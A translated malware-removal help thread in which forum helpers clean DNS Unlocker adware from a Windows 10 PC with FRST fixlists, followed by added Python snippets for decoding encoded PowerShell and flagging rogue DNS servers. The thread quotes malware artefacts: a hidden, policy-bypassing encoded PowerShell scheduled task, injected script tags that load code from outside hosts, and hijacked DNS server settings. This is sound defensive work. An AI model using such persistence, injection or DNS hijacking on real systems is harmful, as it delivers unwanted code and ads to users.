Junior Member (OID)
Pop-ups and redirects in all browsers
The subject is in the title. DNS Unlocker showed up among the newly installed software; removing it with CCleaner did not help.
Win10 x64.
I can't attach the AVZ logs: the utility crashes (including when run as administrator) at step 1.2 with the error "не найден файл(%system32%\ntoskrnl.exe)" (file not found), although the file itself is present.
Attachments
Dear Владимир Самохин, thank you for contacting our forum!
Virus removal is a completely free service on VirusInfo.Info. Helpers will respond to your request very soon. To receive help, you need to provide scan logs from the AVZ and HiJackThis utilities; see the rules for submitting a help request for details.
Hello,
Fix with HiJackThis:
Code:
O2 - BHO: (no name) - {2e32cfe5-df92-4ae5-b0be-609ed0df74a6} - (no file)
O2 - BHO: Money Viking - {c7c5384f-d9e9-4db1-8c72-135ecccbc571} - (no file)
Download Universal Virus Sniffer and create a full uVS autorun image.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member (OID)
- Prepare an AdwCleaner log and attach it to the thread.
- Create a Check Browsers' LNK log and attach it to the thread.
Junior Member (OID)
Attachments
In AdwCleaner, delete everything except the folders named after programs you use (if you don't use anything listed in the log, delete everything). Attach the report after the deletion.
Junior Member (OID)
I deleted everything; the problem remains.
Attachments
- Download Farbar Recovery Scan Tool and save it to the Desktop.
Note: you need to choose the version compatible with your operating system. If you are not sure which version suits your system, download both and try to run them. Only one of them will run on your system.
Run the program with a double click. When the program starts, click Yes to accept the warning. Make sure that "List BCD" and "Driver MD5" are checked in the Optional Scan box.
Click the Scan button. After the scan finishes, a report (FRST.txt) will be created in the same folder the program was run from. Please attach the report in your next message. If the program was run for the first time, a report (Addition.txt) will also be created. Please attach it in your next message.
Junior Member (OID)
Attachments
Are you familiar with the following task, encoded in Base64 and referencing http://fliparray.info?
Code:
Task: {03CE4F75-F7BE-41D5-9755-D5BA228A3A75} - System32\Tasks\{7A080B47-7805-040D-0D11-0B7E7A78110B} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand [Base64 payload omitted]
Copy the text below into Notepad and save the file as fixlist.txt in the same folder from which Farbar Recovery Scan Tool was run:
Code:
CreateRestorePoint:
CloseProcesses:
SearchScopes: HKLM -> {A337602D-2A25-4836-AFA1-FE5B6B5221A1} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> {A337602D-2A25-4836-AFA1-FE5B6B5221A1} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-2573649081-3390896530-2138841444-1002 -> {A337602D-2A25-4836-AFA1-FE5B6B5221A1} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
FF Plugin HKU\S-1-5-21-2573649081-3390896530-2138841444-1002: @mail.ru/GameCenter -> C:\Users\йцукенг\AppData\Local\Mail.Ru\GameCenter\NPDetector.dll [No File]
Folder: C:\ProgramData\SystemExplorer
2016-02-19 18:23 - 2016-02-19 18:23 - 00000000 ____D C:\Users\Все пользователи\91de13f6
2016-02-19 18:23 - 2016-02-19 18:23 - 00000000 ____D C:\ProgramData\91de13f6
File: C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
Folder: C:\WINDOWS\system32\F12
Folder: C:\WINDOWS\system32\WinBioPlugIns
Folder: C:\WINDOWS\bcastdvr
Task: {20AAA7D7-4A0E-44E8-887B-C556DFA54CB9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {2A68777F-12B7-4A74-B93E-FBCEA1CBC8C5} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {35CB3067-02B9-473A-826D-1DDCA4658FDC} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {7B2B8919-ACBD-4965-A672-74E1168EC29F} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {7D0C392E-5D6D-483C-8460-971B2BF2EAA2} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {8370B5B0-5008-44AA-90D4-2A3C4D16265F} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {8C8C5A98-9D4F-490E-8575-B27F34D289C6} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {A1A037F3-5331-4994-AF8E-CE4E5E2C268F} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {B927DAF8-19E8-4687-8207-7993C689EA55} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {DDC15436-0822-4D24-8268-C66C0589C18F} - System32\Tasks\{74F9D181-7BFD-7035-B0B5-6B8D5E8D7370} => /s /n /i:"/rt" "C:\PROGRA~3\91de13f6\bbfb9319.dll"
Task: {DF27F512-2BC0-4F7D-81BF-F282E6752020} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {F10DD45C-9280-4A89-84E8-BD6D40539419} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Reboot:
Run FRST, click the Fix button once, and wait. The program will create a log file (Fixlog.txt). Please attach it in your next message! Note that the computer will be restarted.
Junior Member (OID)
No.
The problem was not fixed.
Attachments
Posted by
Владимир Самохин
No.
Copy the text below into Notepad and save the file as fixlist.txt in the same folder from which Farbar Recovery Scan Tool was run:
Code:
CreateRestorePoint:
CloseProcesses:
Task: {03CE4F75-F7BE-41D5-9755-D5BA228A3A75} - System32\Tasks\{7A080B47-7805-040D-0D11-0B7E7A78110B} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand [Base64 payload omitted]
Reboot:
Run FRST, click the Fix button once, and wait. The program will create a log file (Fixlog.txt). Please attach it in your next message! Note that the computer will be restarted.
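The scheduled task in the two posts above hands its script to powershell.exe through -EncodedCommand, which PowerShell reads as Base64 over UTF-16LE text. As an added example (not part of the thread and not FRST's own code), the following Python decodes such a task line offline for static review and lists the URLs and launch flags it finds; the sample line, its GUID and the example.invalid URL are constructed.

```python
import base64
import binascii
import re

# Constructed sample (harmless script, placeholder GUID and URL), encoded the
# way PowerShell expects for -EncodedCommand: Base64 over UTF-16LE text.
_SCRIPT = '$u="http://updates.example.invalid/u/?a=1";Write-Output $u'
SAMPLE_TASK_LINE = (
    r"Task: {00000000-0000-0000-0000-000000000000} - System32\Tasks\{constructed}"
    " => powershell.exe -nologo -executionpolicy bypass -noninteractive"
    " -windowstyle hidden -EncodedCommand "
    + base64.b64encode(_SCRIPT.encode("utf-16-le")).decode("ascii")
)

# Any parameter starting with "e", followed by its argument.
_PARAM = re.compile(r"(?<!\S)[-/](e[a-z]*)\s+(\S+)", re.IGNORECASE)
_URL = re.compile(r"https?://[^\s\"'<>)]+", re.IGNORECASE)
# Launch flags seen on the task line in this thread.
_LAUNCH_FLAGS = ("-executionpolicy bypass", "-windowstyle hidden", "-noninteractive")


def find_encoded_command(command_line):
    """Return the Base64 argument of -EncodedCommand, or None if absent."""
    for match in _PARAM.finditer(command_line):
        name = match.group(1).lower()
        # PowerShell accepts prefixes of the name (-e, -enc, ...) and -ec.
        if name == "ec" or "encodedcommand".startswith(name):
            return match.group(2)
    return None


def decode_encoded_command(token):
    """Decode the argument to text without executing it; None if malformed."""
    padded = token + "=" * (-len(token) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage_task_line(line):
    """Summarise one task line for an analyst; None if nothing is encoded."""
    token = find_encoded_command(line)
    if token is None:
        return None
    script = decode_encoded_command(token)
    lowered = line.lower()
    return {
        "decoded": script is not None,
        "script": script or "",
        "urls": _URL.findall(script or ""),
        "launch_flags": [f for f in _LAUNCH_FLAGS if f in lowered],
    }


if __name__ == "__main__":
    print(triage_task_line(SAMPLE_TASK_LINE))
```

The decoded text is only read, never run, so the review can be done on an analysis machine from the FRST log alone.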
Junior Member (OID)
Attachments
Are you familiar with the following:
Code:
========================= Folder: C:\ProgramData\SystemExplorer ========================
2016-02-20 21:20 - 2016-02-20 22:10 - 0009650 _____ () C:\ProgramData\SystemExplorer\config.ini
2016-02-20 21:24 - 2016-02-20 22:10 - 0246806 _____ () C:\ProgramData\SystemExplorer\data.sdb
====== End of Folder: ======
Archive the following files into a zip with the password (virus):
Code:
C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
C:\WINDOWS\system32\{86F549EB-A66B-4D6C-958D-CDDD66410751}.bat
C:\WINDOWS\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat
C:\WINDOWS\system32\{F33C3B9B-72AF-418A-B3FD-560646F7CDA2}.bat
C:\WINDOWS\bcastdvr\KnownGameList.bin
Also, please describe how the problem manifests.
Junior Member (OID)
SystemExplorer is a "souped-up" task manager. It was installed after the problem had already appeared, precisely in order to fix it (I tried to use it to see what unnecessary stuff was hanging around in memory, without success).
How the problem manifests, in simple terms: on any site, clicking anywhere (not necessarily on a link, possibly just on text) triggers (or does not trigger) one or more of these events:
1) a new browser window opens, goes to yxo.warmportrait.com/lots-of-letters, and then redirects somewhere
2) a new browser tab opens with random ads
3) the current browser tab is redirected to random ads.
After that, the page can be used normally.
On the "broken" pages, a lot of junk gets appended to the end of <body>, for example:
Code:
<script src="http://yxo.warmportrait.com/amz/aeyJhZmZpZCI6OTA5MCwic3ViYWZmaWQiOjMwMDAsInJldmVudWVzX2FmZmlkIjo5NTYwLCJyZXZlbnVlc19zdWJhZmZpZCI6MTAxMSwiaHJlZiI6Imh0dHA6Ly9ydS5kYXJrc291bHMud2lraWEuY29tL3dpa2kvJUQwJTkwJUQwJUJCJUQwJUI0JUQwJUI4JUQxJThGLF8lRDElODMlRDElODclRDAlQjUlRDAlQkQlRDElOEIlRDAlQjlfJUQwJTlGJUQwJUI1JUQxJTgwJUQwJUIyJUQwJUJFJUQxJTgwJUQwJUJFJUQwJUI0JUQwJUJEJUQwJUJFJUQwJUIzJUQwJUJFXyVEMCU5MyVEMSU4MCVEMCVCNSVEMSU4NSVEMCVCMCIsIndpZHRoIjoxMzY2LCJoZWlnaHQiOjc2OCwiZ2xidiI6Im8zYWQzMjg0NDkiLCJhZGRvbm5hbWUiOiJETlNVbmxvY2tlciJ9.js"></script>
<script async="" type="text/javascript" src="http://a.visadd.com/script/layer/serve?format=1&img=true&cid=layer_fr&isps=false&cbs=0.741785580990836&sid=14567722678&terms=bat%2C%20%u0432%u0441%u043F%u043B%u044B%u0432%u0430%u044E%u0449%u0438%u0435%2C%20%u0431%u0440%u0430%u0443%u0437%u0435%u0440%u0430%u0445%2C%20%u0432%u0441%u0435%u0445%2C%20%u0440%u0435%u0434%u0438%u0440%u0435%u043A%u0442%u044B&httpsite=false&keywords=bat%2C%20%u0432%u0441%u043F%u043B%u044B%u0432%u0430%u044E%u0449%u0438%u0435%2C%20%u0431%u0440%u0430%u0443%u0437%u0435%u0440%u0430%u0445%2C%20%u0432%u0441%u0435%u0445%2C%20%u0440%u0435%u0434%u0438%u0440%u0435%u043A%u0442%u044B&dm=virusinfo.info&charset=windows-1251&ttl=%u0412%u0441%u043F%u043B%u044B%u0432%u0430%u044E%u0449%u0438%u0435%20%u043E%u043A%u043D%u0430%20%u0438%20%u0440%u0435%u0434%u0438%u0440%u0435%u043A%u0442%u044B%20%u0432%u043E%20%u0432%u0441%u0435%u0445%20%u0431%u0440%u0430%u0443%u0437%u0435%u0440%u0430%u0445%20%28%u0437%u0430%u044F%u0432%u043A%u0430%20%u2116%20197359%29&adl=true&loc=http%3A//virusinfo.info/showthread.php%3Ft%3D197359%26p%3D1360285%23post1360285&dm=virusinfo.info&subid=55001&um=Powered by DNSUnlocker"></script>
When visiting such pages, Dr.Web happily reports that it found
Code:
"Object";"Threat";"Action";"Path";
"welcome?pid=75041&said=55001&san=DNSUnlocker&met=1|0";"SCRIPT.Virus";"Заблокировано";"http://w3i.co/welcome?pid=75041&said=55001&san=DNSUnlocker&met=1|0";
If it is turned off, then in addition to the above
1) banners captioned "powered by dnsunlocker" will be injected into pages
2) some words on pages will be turned into links, offering to search for those words in DNS Unlocker
Delete the attachment; also, please clarify: does the problem reproduce in all browsers?
Junior Member (OID)
Google chrome+
microsoft edge -
Overwolf-Browser - (although before the cleanup it was also +)
Posted by
Владимир Самохин
Google chrome+
Copy the text below into Notepad and save the file as fixlist.txt in the same folder from which Farbar Recovery Scan Tool was run:
Code:
CreateRestorePoint:
CloseProcesses:
Tcpip\Parameters: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{823dbb5e-7f96-4dd0-8c0d-b7643fcea65e}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{9228c73e-5fdf-4f30-9fd7-18faa83d658c}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{c062aa10-3e85-4d4e-b1bc-f3dccf78fda7}: [DhcpNameServer] 82.163.143.171
Reboot:
Run FRST, click the Fix button once, and wait. The program will create a log file (Fixlog.txt). Please attach it in your next message! Note that the computer will be restarted.
Clear cookies, browser caches and the DNS cache (http://virusinfo.info/showthread.php?t=128635)
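The fixlist in the post above resets resolver settings that FRST reported under Tcpip\Parameters and the per-interface keys. As an added example (not part of the thread and not FRST's own code), this Python parses lines in that layout and groups every DNS server that is not on a caller-supplied list of expected resolvers; the expected list is an assumption of the example, and the sample addresses and GUIDs are constructed.

```python
import ipaddress
import re

# Constructed sample in the layout shown in the fixlist above; the addresses
# come from documentation and private ranges, not from the thread.
SAMPLE_LOG = r"""Tcpip\Parameters: [NameServer] 203.0.113.171 203.0.113.173
Tcpip\..\Interfaces\{11111111-1111-1111-1111-111111111111}: [DhcpNameServer] 203.0.113.171
Tcpip\..\Interfaces\{22222222-2222-2222-2222-222222222222}: [DhcpNameServer] 192.168.1.1
"""

_LINE = re.compile(
    r"^Tcpip\\(?P<scope>\S+?): \[(?P<value>(?:Dhcp)?NameServer)\] (?P<servers>.+)$"
)


def parse_resolver_lines(log_text):
    """Return (scope, registry value, address) for every DNS server listed."""
    entries = []
    for line in log_text.splitlines():
        match = _LINE.match(line.strip())
        if not match:
            continue
        # The value may hold several servers separated by spaces or commas.
        for token in re.split(r"[,\s]+", match["servers"].strip()):
            try:
                address = ipaddress.ip_address(token)
            except ValueError:
                continue  # not an IP address; ignore the token
            entries.append((match["scope"], match["value"], address))
    return entries


def unexpected_resolvers(log_text, expected):
    """Map each resolver outside `expected` to the places that reference it."""
    allowed = {ipaddress.ip_address(item) for item in expected}
    report = {}
    for scope, value, address in parse_resolver_lines(log_text):
        if address not in allowed:
            report.setdefault(str(address), []).append(f"{scope} [{value}]")
    return report


if __name__ == "__main__":
    # Assumption: the router at 192.168.1.1 is the only resolver this host
    # is supposed to use.
    for server, places in unexpected_resolvers(SAMPLE_LOG, {"192.168.1.1"}).items():
        print(server, "->", ", ".join(places))
```

A resolver that appears both as a static NameServer and as a DhcpNameServer on several interfaces, as in the fixlist above, is worth checking against what the router or ISP actually hands out.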
Junior Member (OID)
Looks like it's cured. Thanks!
Attachments